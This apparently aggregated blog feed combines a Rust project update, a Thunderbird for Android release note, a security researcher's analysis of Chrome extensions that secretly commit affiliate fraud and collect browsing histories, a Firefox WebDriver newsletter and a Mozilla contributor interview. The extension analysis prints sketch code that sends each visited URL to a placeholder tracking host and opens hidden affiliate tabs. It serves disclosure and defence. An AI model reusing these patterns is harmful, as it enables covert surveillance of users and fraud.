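fn main() {}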

We have also been working towards a release of the dynosaur crate that enables dynamic dispatch for traits with async functions. This is intended as a transitionary step before we implement true dynamic dispatch. The next steps are to polish the implementation and issue a public call for testing.

With respect to async drop experiments, @nikomatsakis began reviews. It is expected that reviews will continue for some time as this is a large PR.

Finally, no progress has been made towards async WG reorganization. A meeting was scheduled but deferred. @tmandry is currently drafting an initial proposal.

We have made significant progress on resolving blockers to Linux building on stable. Support for struct fields in the offset_of! macro has been stabilized. The final naming for the "derive-smart-pointer" feature has been decided as #[derive(CoercePointee)]; @dingxiangfei2009 prepared PR #131284 for the rename and is working on modifying the rust-for-linux repository to use the new name. Once that is complete, we will be able to stabilize. We decided to stabilize support for references to statics in constants (the pointers-refs-to-static feature) and are now awaiting a stabilization PR from @dingxiangfei2009.
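
For readers unfamiliar with it, offset_of! computes a field's byte offset at compile time; here is a small stable-Rust example (Packet is a made-up struct):

use std::mem::offset_of;

#[repr(C)]
struct Packet {
    kind: u8,
    len: u16,
    payload: u32,
}

fn main() {
    // With `#[repr(C)]`, these offsets follow C layout rules:
    // `len` is aligned to 2 bytes and `payload` to 4.
    assert_eq!(offset_of!(Packet, kind), 0);
    assert_eq!(offset_of!(Packet, len), 2);
    assert_eq!(offset_of!(Packet, payload), 4);
}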

Rust for Linux (RfL) is one of the major users of the asm-goto feature (and inline assembly in general) and we have been examining various extensions. @nbdd0121 authored a hackmd document detailing RfL's experiences and identifying areas for improvement. This led to two immediate action items: making target blocks safe-by-default (rust-lang/rust#119364) and extending const to support embedded pointers (rust-lang/rust#128464).

Finally, we have been finding an increasing number of stabilization requests at the compiler level, and so @wesleywiser and @davidtwco from the compiler team have started attending meetings to create a faster response. One of the results of that collaboration is RFC #3716, authored by Alice Ryhl, which proposes a method to manage compiler flags that modify the target ABI. Our previous approach has been to create distinct targets for each combination of flags, but the number of flags needed by the kernel makes that impractical. Authoring the RFC revealed more such flags than previously recognized, including those that modify LLVM behavior.

The Rust 2024 edition is progressing well and is on track to be released on schedule. The major milestones include preparing to stabilize the edition by November 22, 2024, with the actual stabilization occurring on November 28, 2024. The edition will then be cut to beta on January 3, 2025, followed by an announcement on January 9, 2025, indicating that Rust 2024 is pending release. The final release is scheduled for February 20, 2025.

The priorities for this edition have been to ensure its success without requiring excessive effort from any individual. The team is pleased with the progress, noting that this edition will be the largest since Rust 2015, introducing many new and exciting features. The process has been carefully managed to maintain high standards without the need for high-stress heroics that were common in past editions. Notably, the team has managed to avoid cutting many items from the edition late in the development process, which helps prevent wasted work and burnout.

All priority language items for Rust 2024 have been completed and are ready for release. These include several key issues and enhancements. Additionally, there are three changes to the standard library, several updates to Cargo, and an exciting improvement to rustdoc that will significantly speed up doctests.

This edition also introduces a new style edition for rustfmt, which includes several formatting changes.

The team is preparing to start final quality assurance crater runs. Once these are triaged, the nightly beta for Rust 2024 will be announced, and wider testing will be solicited.

Rust 2024 will be stabilized in nightly in late November 2024, cut to beta on January 3, 2025, and officially released on February 20, 2025. More details about the edition items can be found in the Edition Guide.

Goals with updates

  • camelid has started working on using the new lowering schema for more than just const parameters, which once done will allow the introduction of a min_generic_const_args feature gate.
  • compiler-errors has been working on removing the eval_x methods on Const that do not perform proper normalization and are incompatible with this feature.
  • Posted the September update.
  • Created more automated infrastructure to prepare the October update, utilizing an LLM to summarize updates into one or two sentences for a concise table.
  • No progress has been made on this goal.
  • The goal will be closed as consensus indicates stabilization will not be achieved in this period; it will be revisited in the next goal period.
  • No major updates to report.
  • Preparing a talk for next week's EuroRust has taken away most of the free time.
  • Key developments: With the PR for supporting implied super trait bounds landed (#129499), the current implementation is mostly complete in that it allows most code that should compile, and should reject all code that shouldn't.
  • Further testing is required, with the next steps being improving diagnostics (#131152), and fixing more holes before const traits are added back to core.
  • A work-in-progress pull request is available at https://github.com/weihanglo/cargo/pull/66.
  • The use of wasm32-wasip1 as a default sandbox environment is unlikely due to its lack of support for POSIX process spawning, which is essential for various build script use cases.
  • The Autodiff frontend was merged, including over 2k LoC and 30 files, making the remaining diff much smaller.
  • The Autodiff middle-end is likely getting a redesign, moving from a library-based to a pass-based approach for LLVM.
  • Significant progress was made with contributions by @x-hgg-x, improving the resolver test suite in Cargo to check feature unification against a SAT solver.
  • This was followed by porting the test cases that tripped up PubGrub to Cargo's test suite, laying the groundwork to prevent regression on important behaviors when Cargo switches to PubGrub and preparing for fuzzing of features in dependency resolution.
  • The team is working on a consensus for handling generic parameters, with both PRs currently blocked on this issue.
  • Attempted stabilization of -Znext-solver=coherence was reverted due to a hang in nalgebra, with subsequent fixes improving but not fully resolving performance issues.
  • No significant changes to the new solver have been made in the last month.
  • GnomedDev pushed rust-lang/rust#130553, which replaced an old Clippy infrastructure with a faster one (string matching into symbol matching).
  • Inspections into Clippy's type sizes and cache alignment are being started, but nothing fruitful yet.
  • The linting behavior was reverted until an unspecified date.
  • The next steps are to decide on the future of linting and to write the never patterns RFC.
  • The PR https://github.com/rust-lang/crates.io/pull/9423 has been merged.
  • Work on the frontend feature is in progress.
  • Key developments in the 'Scalable Polonius support on nightly' project include fixing test failures due to off-by-one errors from old mid-points, and ongoing debugging of test failures with a focus on automating the tracing work.
  • Efforts have been made to accept variations of issue #47680, with potential adjustments to active loans computation and locations of effects. Amanda has been cleaning up placeholders in the work-in-progress PR #130227.
  • rust-lang/cargo#14404 and rust-lang/cargo#14591 have been addressed.
  • Waiting on time to focus on this in a couple of weeks.
  • Key developments: Added the cases in the issue list to the UI test to reproduce the bug or verify the non-reproducibility.
  • Blockers: null.
  • Help wanted: Help test the deadlock code in the issue list and try to reproduce the issue.
  • Students from the CMU Practicum Project have started writing function contracts that include safety conditions for some unsafe functions in the core library, and verifying that safe abstractions respect those pre-conditions and are indeed safe.
  • Help is needed to write more contracts, integrate new tools, review pull requests, or participate in the repository discussions.
  • Progress has been made in matching rustc suggestion output within annotate-snippets, with most cases now aligned.
  • The focus has been on understanding and adapting different rendering styles for suggestions to fit within annotate-snippets.

Goals without updates

The following goals have not received updates in the last month:

Mozilla ThunderbirdThunderbird for Android 8.0 Takes Flight

Just over two years ago, we announced our plans to bring Thunderbird to Android by taking K-9 Mail under our wing. The journey took a little longer than we had originally anticipated and there was a lot to learn along the way, but the wait is finally over! For all of you who have ever asked “when is Thunderbird for Android coming out?”, the answer is – today! We are excited to announce that the first stable release of Thunderbird for Android is out now, and we couldn’t be prouder of the newest, most mobile member of the Thunderbird family.

Resources

Thanks for Helping Thunderbird for Android Fly

Thank you for being a part of the community and sharing this adventure on Android with us! We’re especially grateful to all of you who have helped us test the beta and release candidate images. Your feedback helped us find and fix bugs, test key features, and polish the stable release. We hope you enjoy using the newest Thunderbird, now and for a long time to come!

The post Thunderbird for Android 8.0 Takes Flight appeared first on The Thunderbird Blog.

Wladimir PalantThe Karma connection in Chrome Web Store

Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users’ every move to some Amazon cloud server. But that wasn’t all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don’t appear to be malicious yet.

While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than 50 people and secured tons of cash in venture capital. Maybe a mistake on my part?

After looking into it thoroughly, this explanation seems unlikely. Not only does Karma share some backend infrastructure and considerable amounts of code with the malicious extensions. Not only does Karma Shopping Ltd. admit to selling users’ browsing profiles in their privacy policy. There is even more tying them together, including a mobile app developed by Karma Shopping Ltd. whereas the identical Chrome extension is supposedly developed by the mysterious evildoer.

Screenshot of the karmanow.com website, with the Karma logo visible and a yellow button “Add to Chrome - It’s Free”

The affected extensions

Most of the extensions in question changed hands relatively recently, the first ones in the summer of 2023. The malicious code was added immediately after the ownership transfer, with some extensions even requesting additional privileges, citing bogus reasons. A few extensions have been developed this year by whoever is behind this.

Some extensions from the latter group don’t have any obvious malicious functionality at this point. If there is tracking, it only covers the usage of the extension’s user interface rather than the entire browsing behavior. This can change at any time of course.

Name Weekly active users Extension ID Malicious functionality
Hide YouTube Shorts 100,000 aljlkinhomaaahfdojalfmimeidofpih Affiliate fraud, browsing profile collection
DarkPDF 40,000 cfemcmeknmapecneeeaajnbhhgfgkfhp Affiliate fraud, browsing profile collection
Sudoku On The Rocks 1,000 dncejofenelddljaidedboiegklahijo Affiliate fraud
Dynamics 365 Power Pane 70,000 eadknamngiibbmjdfokmppfooolhdidc Affiliate fraud, browsing profile collection
Israel everywhere 70 eiccbajfmdnmkfhhknldadnheilniafp
Karma | Online shopping, but better 500,000 emalgedpdlghbkikiaeocoblajamonoh Browsing profile collection
Where is Cookie? 93 emedckhdnioeieppmeojgegjfkhdlaeo
Visual Effects for Google Meet 1,000,000 hodiladlefdpcbemnbbcpclbmknkiaem Affiliate fraud
Quick Stickies 106 ihdjofjnmhebaiaanaeeoebjcgaildmk
Nucleus: A Pomodoro Timer and Website Blocker 20,000 koebbleaefghpjjmghelhjboilcmfpad Affiliate fraud, browsing profile collection
Hidden Airline Baggage Fees 496 kolnaamcekefalgibbpffeccknaiblpi Affiliate fraud
M3U8 Downloader 100,000 pibnhedpldjakfpnfkabbnifhmokakfb Affiliate fraud

Update (2024-11-11): Hide YouTube Shorts, DarkPDF, Nucleus and Hidden Airline Baggage Fees have been taken down. Two of them have been marked as malware and one as violating Chrome Web Store policies, meaning that existing extension users will be notified. I cannot see the reason for different categorization, the functionality being identical in all of these extensions. The other extensions currently remain active.

Hiding in plain sight

Whoever wrote the malicious code chose not to obfuscate it but to make it blend in with the legitimate functionality of the extension. Clearly, the expectation was that nobody would look at the code too closely. So there is for example this:

if (window.location.href.startsWith("http") ||
    window.location.href.includes("m.youtube.com")) {
  
}

It looks like the code inside the block would only run on YouTube. Only when you stop and consider the logic properly do you realize that it runs on every website. In fact, that’s the block wrapping the calls to the malicious functions.

The malicious functionality is split between content script and background worker for the same reason, even though it could have been kept in one place. This way each part looks innocuous enough: there is some data collection in the content script, and then it sends a check_shorts message to the background worker. And the background worker “checks shorts” by querying some web server. Together this just happens to send your entire browsing history into the Amazon cloud.
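
For illustration, the split described above boils down to something like the following sketch. This is not the extension’s actual code: the check_shorts message name comes from the analysis, while the endpoint and variable names are placeholders.

// content script: looks like an innocent feature check
chrome.runtime.sendMessage({ type: "check_shorts", url: window.location.href });

// background worker: "checking shorts" means reporting the visited URL
chrome.runtime.onMessage.addListener((message) => {
  if (message.type === "check_shorts") {
    fetch("https://tracking.example/check?u=" + encodeURIComponent(message.url));
  }
});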

Similarly, there are some complicated checks in the content script which eventually result in a loadPdfTab message to the background worker. The background worker dutifully opens a new tab for that address and, strangely, closes it after 9 seconds. Only when you sort through the layers does it become obvious that this is actually about adding an affiliate cookie.
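
A background handler along these lines would produce the behavior just described; again this is an illustrative sketch, with the loadPdfTab message name taken from the analysis and everything else assumed.

chrome.runtime.onMessage.addListener((message) => {
  if (message.type === "loadPdfTab") {
    // open the affiliate URL in an inactive tab, give the affiliate cookie
    // time to be set, then quietly close the tab again
    chrome.tabs.create({ url: message.url, active: false }, (tab) => {
      setTimeout(() => chrome.tabs.remove(tab.id), 9000);
    });
  }
});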

And of course there is the usual bunch of complicated conditions, making sure that this functionality is not triggered too soon after installation and generally doesn’t pop up reliably enough that users could trace it back to this extension.

Affiliate fraud functionality

The affiliate fraud functionality is tied to the kra18.com domain. When this functionality is active, the extension will regularly download data from https://www.kra18.com/v1/selectors_list?&ex=90 (90 being the extension ID here, the server accepts eight different extension IDs). That’s a long list containing 6,553 host names:

Screenshot of JSON data displayed in the browser. The selectors key is expanded, twenty domain names like drinkag1.com are visible in the list.

Update (2024-11-19): As of now, the owners of this server disabled the endpoints mentioned here. You can still see the original responses on archive.today however.

Whenever one of these domains is visited and the moons are aligned in the right order, another request to the server is made with the full address of the page you are on. For example, the extension could request https://www.kra18.com/v1/extension_selectors?u=https://www.tink.de/&ex=90:

Screenshot of JSON data displayed in the browser. There are keys shortsNavButtonSelector, url and others. The url key contains a lengthy URL from awin1.com domain.

The shortsNavButtonSelector key is another red herring, the code only appears to be using it. The important key is url, the address to be opened in order to set the affiliate cookie. And that’s the address sent via loadPdfTab message mentioned before if the extension decides that right now is a good time to collect an affiliate commission.

There are also additional “selectors,” downloaded from https://www.kra18.com/v1/selectors_list_lr?&ex=90. Currently this functionality is only used on the amazon.com domain and will replace some product links with links going through jdoqocy.com domain, again making sure an affiliate commission is collected. That domain is owned by Common Junction LLC, an affiliate marketing company that published a case study on how their partnership with Karma Shopping Ltd. (named Shoptagr Ltd. back then) helped drive profits.

Browsing profile collection

Some of the extensions will send each page visit to https://7ng6v3lu3c.execute-api.us-east-1.amazonaws.com/EventTrackingStage/prod/rest. According to the extension code, this is an Alooma backend. Alooma is a data integration platform that was acquired by Google a while ago. Data transmitted could look like this:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: token: sBGUbZm3hp, timestamp: 1730137880441, user_id: 90, distinct_id: 7796931211, navigator_language: en-US, referrer: https://www.google.com/, local_time: Mon Oct 28 2024 18:51:20 GMT+0100 (Central European Standard Time), event: page_visit, component: external_extension, external: true, current_url: https://example.com/

Yes, this is sent for each and every page loaded in the browser, at least after you’ve been using the extension for a while. And distinct_id is my immutable user ID here.

But wait, it’s a bit different for the Karma extension. Here you can opt out! Well, that’s only if you are using Firefox because Mozilla is rather strict about unexpected data collection. And if you manage to understand what “User interactions” means on this options page:

Screenshot of an options page with two switches labeled User interactions and URL address. The former is described with the text: Karma is a community of people who are working together to help each other get a great deal. We collect anonymized data about coupon codes, product pricing, and information about Karma is used to contribute back to the community. This data does not contain any personably identifiable information such as names or email addresses, but may include data supplied by the browser such as url address.

Well, I may disagree with the claim that url addresses do not contain personably identifiable information. And: yes, this is the entire page. There really isn’t any more text.

The data transmitted is also somewhat different:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: referrer: https://www.google.com/, current_url: https://example.com/, browser_version: 130, tab_id: 5bd19785-e18e-48ca-b400-8a74bf1e2f32, event_number: 1, browser: chrome, event: page_visit, source: extension, token: sBGUbZm3hp, version: 10.70.0.21414, timestamp: 1730138671937, user_id: 6372998, distinct_id: 6b23f200-2161-4a1d-9400-98805c17b9e3, navigator_language: en-US, local_time: Mon Oct 28 2024 19:04:31 GMT+0100 (Central European Standard Time), ui_config: old_save, save_logic: rules, show_k_button: true, show_coupon_scanner: true, show_popups: true

The user_id field no longer contains the extension ID but my personal identifier, complementing the identifier in distinct_id. There is a tab_id field adding more context, so that it is not only possible to recognize which page I navigated to and from where but also to distinguish different tabs. And some more information about my system is always useful of course.

Who is behind this?

Eleven extensions on my list are supposedly developed by a person going by the name Rotem Shilop or Roni Shilop or Karen Shilop. This isn’t a very common last name, and if this person really exists, they have managed to leave no traces online. Yes, I also searched in Hebrew. Yet one extension is developed by Karma Shopping Ltd. (formerly Shoptagr Ltd.), a company based in Israel with at least 50 employees. An accidental association?

It doesn’t look like it. I’m not going into the details of shared code and tooling, let’s just say: it’s very obvious that all twelve extensions are being developed by the same people. Of course, there is still the possibility that the eleven malicious extensions are not associated directly with Karma Shopping but with some rogue employee or contractor or business partner.

However, it isn’t only the code. As explained above, five extensions including Karma share the same tracking backend which is found nowhere else. They are even sending the same access token. Maybe this backend isn’t actually run by Karma Shopping and they are only one of the customers of some third party? Yet if you look at the data being sent, clearly the Karma extension is considered first-party. It’s the other extensions which are sending external: true and component: external_extension flags.

Then maybe Karma Shopping is merely buying data from a third party, without actually being affiliated with their extensions? Again, this is possible but unlikely. One indicator is the user_id field in the data sent by these extensions. It’s the same extension ID that they use for internal communication with the kra18.com server. If Karma Shopping were granting a third party access to their server, wouldn’t they assign that third party some IDs of their own?

And those affiliate links produced by the kra18.com server? Some of them clearly mention karmanow.com as the affiliate partner.

Screenshot of JSON data displayed in the browser. url key is a long link pointing to go.skimresources.com. sref query parameter of the link is https://karmanow.com. url query parameter of the link is www.runinrabbit.com.

Finally, if we look at Karma Shopping’s mobile apps, they develop two of them. In addition to the Karma app, the app stores also contain an app called “Sudoku on the Rocks,” developed by Karma Shopping Ltd. Which is a very strange coincidence because an identical “Sudoku on the Rocks” extension also exists in the Chrome Web Store. Here however the developer is Karen Shilop. And Karen Shilop chose to include hidden affiliate fraud functionality in their extension.

By the way, guess who likes the Karma extension a lot and left a five-star review?

Screenshot of a five-star review by Rona Shilop with a generic-looking avatar of woman with a cup of coffee. The review text says: Thanks for making this amazing free extension. There is a reply by Karma Support saying: We’re so happy to hear how much you enjoy shopping with Karma.

I contacted Karma Shopping Ltd. via their public relations address about their relationship to these extensions and the Shilop person but haven’t heard back so far.

Update (2024-10-30): An extension developer told me that they were contacted on multiple independent occasions about selling their Chrome extension to Karma Shopping, each time by C-level executives of the company, from official karmanow.com email addresses. The first outreach was in September 2023, where Karma was supposedly looking into adding extensions to their portfolio as part of their growth strategy. They offered to pay between $0.20 and $1 per weekly active user.

Update (2024-11-11): Another hint pointed me towards this GitHub issue. While the content has been removed here, you can still see the original content in the edit history. It’s the author of the Hide YouTube Shorts extension asking the author of the DarkPDF extension about that Karma company interested in buying their extensions.

What does Karma Shopping want with the data?

It is obvious why Karma Shopping Ltd. would want to add their affiliate functionality to more extensions. After all, affiliate commissions are their line of business. But why collect browsing histories? Only to publish semi-insightful articles on people’s shopping behavior?

Well, let’s have a look at their privacy policy which is actually meaningful for a change. Under 1.3.4 it says:

Browsing Data. In case you a user of our browser extensions we may collect data regarding web browsing data, which includes web pages visited, clicked stream data and information about the content you viewed.

How we Use this Data. We use this Personal Data (1) in order to provide you with the Services and feature of the extension and (2) we will share this data in an aggregated, anonymized manner, for marketing research and commercial use with our business partners.

Legal Basis. (1) We process this Personal Data for the purpose of providing the Services to you, which is considered performance of a contract with you. (2) When we process and share the aggregated and anonymized data we will ask for your consent.

First of all, this tells us that Karma collecting browsing data is official. They also openly state that they are selling it. Good to know and probably good for their business as well.

As to the legal basis: I am no lawyer but I have a strong impression that they don’t deliver on the “we will ask for your consent” promise. No, not even that Firefox options page qualifies as informed consent. And this makes this whole data collection rather doubtful in the light of GDPR.

There is also a difference between anonymized and pseudonymized data. The data collection seen here is pseudonymized: while it doesn’t include my name, there is a persistent user identifier which is still linked to me. It is usually fairly easy to deanonymize pseudonymized browsing histories, e.g. because people tend to visit their social media profiles rather often.

Actually anonymized data would not allow associating it with any single person. This is very hard to achieve, and we’ve seen promises of aggregated and anonymized data go very wrong. While it’s theoretically possible that Karma correctly anonymizes and aggregates data on the server side, this is a rather unlikely outcome for a company that, as we’ve seen above, confuses the lack of names and email addresses with anonymity.

But of course these considerations only apply to the Karma extension itself. Because related extensions like Hide YouTube Shorts just straight out lie:

Screenshot of a Chrome Web Store listing. Text under the heading Privacy: The developer has disclosed that it will not collect or use your data.

Some of these extensions actually used to have a privacy policy before they were bought. Now only three still have an identical and completely bogus privacy policy. Sudoku on the Rocks happens to be among these three, and the same privacy policy is linked by the Sudoku on the Rocks mobile apps which are officially developed by Karma Shopping Ltd.

Firefox Developer ExperienceFirefox WebDriver Newsletter 132

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 132 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

We are always grateful to receive external contributions; here are the ones which made it into Firefox 132:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi.

WebDriver BiDi

Retry commands to avoid AbortError failures

In release 132, one of our primary focus areas was enhancing the reliability of command execution.

Internally, we sometimes need to forward commands to content processes. This can easily fail, particularly when targeting a page which was either newly created or in the middle of a navigation. These failures often result in errors such as "AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved".

<- {
  "type":"error",
  "id":14,
  "error":"unknown error",
  "message":"AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved",
  "stacktrace":""
}

While there are valid technical reasons that prevent command execution in some cases, there are also many instances where retrying the command is a feasible solution.

The browsingContext.setViewport command was specifically updated in order to retry an internal command, as it was frequently failing. Then we updated our overall implementation in order to retry commands automatically if we detect that the page is navigating or about to navigate. Note that retrying commands is not entirely new; it’s an internal feature we were already using in a few handpicked commands. The changes in Firefox 132 just made its usage much more prevalent.

New preference: remote.retry-on-abort

To go one step further, we decided to allow all commands to be retried by default when the remote.retry-on-abort preference is set to true. Note that true is the default value, which means that with Firefox 132, all commands which need to reach the content process might now be retried (documentation). If you were previously relying on or working around the aforementioned AbortError, and notice an unexpected issue with Firefox 132, you can update this preference to make the behavior closer to previous Firefox versions. Please also file a Bug to let us know about the problem.
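
For example, if you drive Firefox through the Selenium JavaScript bindings, you could set the preference when creating the session. This is a minimal sketch assuming geckodriver and the selenium-webdriver package, not an officially documented recipe:

const { Builder } = require("selenium-webdriver");
const firefox = require("selenium-webdriver/firefox");

async function main() {
  const options = new firefox.Options();
  // Restore behavior closer to Firefox 131 and earlier by disabling retries.
  options.setPreference("remote.retry-on-abort", false);

  const driver = await new Builder()
    .forBrowser("firefox")
    .setFirefoxOptions(options)
    .build();
  // ... run the session as usual ...
  await driver.quit();
}

main();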

Bug fixes

Support.Mozilla.OrgContributor spotlight – Michele Rodaro

Hi Mozillians,

In today’s edition, I’d like to introduce you all to Michele Rodaro, a locale leader for Italian in the Mozilla Support platform. He is a professional architect, but he has been finding pleasure and meaning in contributing to Mozilla since 2006. I’ve met him on several occasions in the past, and reading his answers feels exactly like talking to him in real life. I’m sure you can sense his warmth and kindness just by reading his responses. Here’s a beautiful analogy from Michele about his contributions to Mozilla as they relate to his background in architecture:

I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority.

Q: Hi Michele, can you tell us more about yourself and what keeps you busy these days?

I live in Gemona del Friuli, a small town in the Friuli Venezia Giulia region, in the north-east of Italy, bordering Austria and Slovenia. I am a freelance architect, having graduated from Venice’s University many years ago. I own a professional studio and I mainly deal with residential planning, renovations, and design. In my free time I like to draw, read history, art, literature, satire and comics, listen to music, take care of my cats and, of course, translate or update SUMO Knowledge Base articles into Italian.

When I was younger, I played many sports (skiing, basketball, rugby, and athletics). When I can, I continue to go skiing in the beautiful mountains of my region. Oh, I also played piano in a jazz rock band I co-founded in the late 70s and early 80s (good times). In this period, from a professional point of view, I am trying to survive the absurd bureaucracy that is increasingly oppressive in my working environment. As for SUMO, I am maintaining the Italian KB at 100% of the translations, and supporting new localizers to help them align with our translation style.

Q: You got started with the Italian local forum in 2006 before expanding your contribution to SUMO in 2008. Can you tell us more about the different types of contributions that you’re doing for Mozilla?

I found out about Firefox in November 2005 and discovered the Mozilla Italia community and their support forum. Initially, I used the forum to ask for help from other volunteers and, after a short time, I found myself personally involved in providing online assistance to Italian users in need. Then I became a moderator of the forum and in 2008, with the help of my friend @Underpass, I started contributing to the localization of SUMO KB articles (the KB was born in that year). It all started like that.

Today, I am an Italian locale leader in SUMO. I take care of the localization of KB articles and train new Italian localizers. I continue to provide support to users on the Italian forums and when I manage to solve a problem I am really happy, but my priority is the SUMO KB because it is an essential source to help users who search online for an immediate solution to any problem encountered with Firefox on all platforms and devices or with Thunderbird, and want to learn the various features of Mozilla applications and services. Forum support has also benefited greatly from KB articles because, instead of having to write down all the procedures to solve a user’s problem every time, we can simply provide them with the link to the article that could solve the problem without having to write the same things every time, especially when the topic has already been discussed many times, but users have not searched our forum.

Q: In addition to translating articles on SUMO, you’re also involved in product translation on Pontoon. With your experience across both platforms, what do you think SUMO can learn from Pontoon, and how can we improve our overall localization process?

I honestly don’t know, they are quite different ways of doing things in terms of using translation tools specifically. I started collaborating with Pontoon’s Italian l10n team in 2014… Time flies… The rules, the style guides, and the QA process adopted for the Italian translations on Pontoon are the same ones we adopted for SUMO. I have to say that I am much more comfortable with SUMO’s localization process and tool, maybe because I have seen it start off, grow and evolve over time. Pontoon introduced Pretranslation, which helps a lot in translating strings, although it still needs improvements. A machine translation of strings that are not already in Pontoon’s “Translation Memory” is proposed. Sometimes that works fine, other times we need to correct the proposal and save it after escalating it on GitHub, so that in the future that translation becomes part of the “Translation Memory”. If the translation of a string is not accurate, it can be changed at any time.

I don’t know if it can be a solution for some parts of SUMO articles. We already have templates, maybe we should further implement the creation and use of templates, focusing on this tool, to avoid typing the translation of procedures/steps that are repeated identically in many articles.

Q: What are the biggest challenges you’re currently facing as a SUMO contributor? Are there any specific technical issues you think should be prioritized for fixing?

Being able to better train potential new localizers, and help infuse the same level of passion that I have in managing the Italian KB of SUMO. As for technical issues, staying within the scope of translating support articles, I do not encounter major problems in terms of translating and updating articles, but perhaps it is because I now know the strengths and weaknesses of the platform’s tools and I know how to manage them.

Maybe we could find a way to remedy what is usually the most frustrating thing for a contributor/localizer who, for example, is updating an article directly online: the loss of their changes after clicking the “Preview Content” button. That is when you click on the “Preview Content” button after having translated an article to correct any formatting/typing errors. If you accidentally click a link in the preview and don’t right-click the link to select “Open Link in New Tab” from the context menu, the link page opens, replacing/overwriting the editing page, and if you try to go back, everything you’ve edited/translated in the input field is gone forever… And you have to start over. A nightmare that happened to me more than once, often because I was in a hurry. I used to rely on a very good extension that saved all the texts I typed in the input fields and that I could recover whenever I wanted, but it is no longer updated for the newer versions of Firefox. I’ve tried others, but they don’t convince me. So, in my opinion, there should be a way to avoid this issue without installing extensions. I’m not a developer, I don’t know if it’s easy to find a solution, but we have Mozilla developers who are great ;)

Maybe there could be a way to automatically save a draft of the edit every “x” seconds to recover it in case of errors with the article management. Sometimes, even the “Preview Content” button could be dangerous. If you accidentally lost your Internet connection and didn’t notice, if you click on that button, the preview is not generated, you lose everything and goodbye products!

Q: Your background as a freelance architect is fascinating! Could you tell us more about that? Do you see any connections between your architectural work and your contribution to Mozilla, or do you view them as completely separate aspects of your life?

As an architect I can only speak from my personal experience, because I live in a small town, in a beautiful region which presents me with very different realities than those colleagues have to deal with in big cities like Rome or Milan. Here everything is quieter, less frenetic, which is sometimes a good thing, but not always. The needs of those who commission a project are different if you have to carry it out in a big city, the goal is the same but, urban planning, local building regulations, available spaces in terms of square footage, market requests/needs, greatly influence the way an architect works. Professionally I have had many wonderful experiences in terms of design and creativity (houses, residential buildings, hotels, renovations of old rural or mountain buildings, etc.), challenges in which you often had to play with just a centimeter of margin to actually realize your project.

Connection between architecture and contribution to Mozilla? Good question. I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority. If someone wants our “cookies” and unfortunately often not only those, they have to knock, ask permission and if we do not want to have intrusive guests, that someone has to turn around, go away and let us do our things without sticking their nose in. This is my idea of Mozilla, this is the reason that pushed me to believe in its values (The user and his privacy first) and to contribute as a volunteer, and this is what I would like to continue to believe even if someone might say that I am naive, that “they are all the same”.

My duty as an architect is like that of a good parent, when necessary I must always warn my clients about why I would advise against certain solutions that I, from professional experience, already know are difficult to implement or that could lead to future management and functionality problems. In any case I always look for solutions that can satisfy my clients’ desires. Design magazines are beautiful, but it is not always possible to reproduce a furnishing solution in living environments that are completely different from the spaces of a showroom set up to perfection for a photo shoot… Mozilla must continue to do what it has always done, educate and protect users, even those who do not use its browser or its products, from those “design magazines” that could lead them to inadvertently make bad choices that they could regret one day.

Q: Can you tell us more about the Italian locale team in SUMO and how do you collaborate with each other?

First of all, it’s a fantastic team! Everyone does what they do best, there are those who help users in need on the forums, those who translate, those who check the translations and do QA by reporting things that need to be corrected or changed, from punctuation errors to lack of fluency or clarity in the translation, those who help with images for articles because often the translator needs the specific image for an operating system that he does not have.

As for translations, which is my main activity, we usually work together with 4- 5 collaborators/friends, and we use a consolidated procedure. Translation of an article, opening a specific discussion for the article in the forum section dedicated to translations with the link of the first translation and the request for QA. Intervention of anyone who wants to report/suggest a correction or a change to be made, modification, link to the new revised version based on the suggestions, rereading and if everything is ok, approval and publication. The translation section is public — like all the other sections of the Mozilla Italia forum — and anyone can participate in the discussion.

We are all friends, volunteers, some of us know each other only virtually, others have had the chance to meet in person. The atmosphere is really pleasant and even when a discussion goes on too long, we find a way to lighten the mood with a joke or a tease. No one acts as the professor, we all learn something new. Obviously, there are those like me who are more familiar with the syntax/markup and the tools of the SUMO Wiki and those who are less, but this is absolutely not a problem to achieve the final result which is to provide a valid guide to users.

Q: Looking back on your contribution to SUMO, what was the most memorable experience for you? Anything that you’re most proud of?

It’s hard to say… I’m not a tech geek, I don’t deal with code, scripts or computer language so my contribution is limited to translating everything that can be useful to Italian users of Mozilla products/programs. So I would say: the first time I reached the 100% translation percentage of all the articles in the Italian dashboard. I have always been very active and available over the years with the various Content Managers of SUMO. When I received their requests for collaboration, I did tests, opened bugs related to the platform, and contributed to the developers’ requests by testing the procedures to solve those bugs.

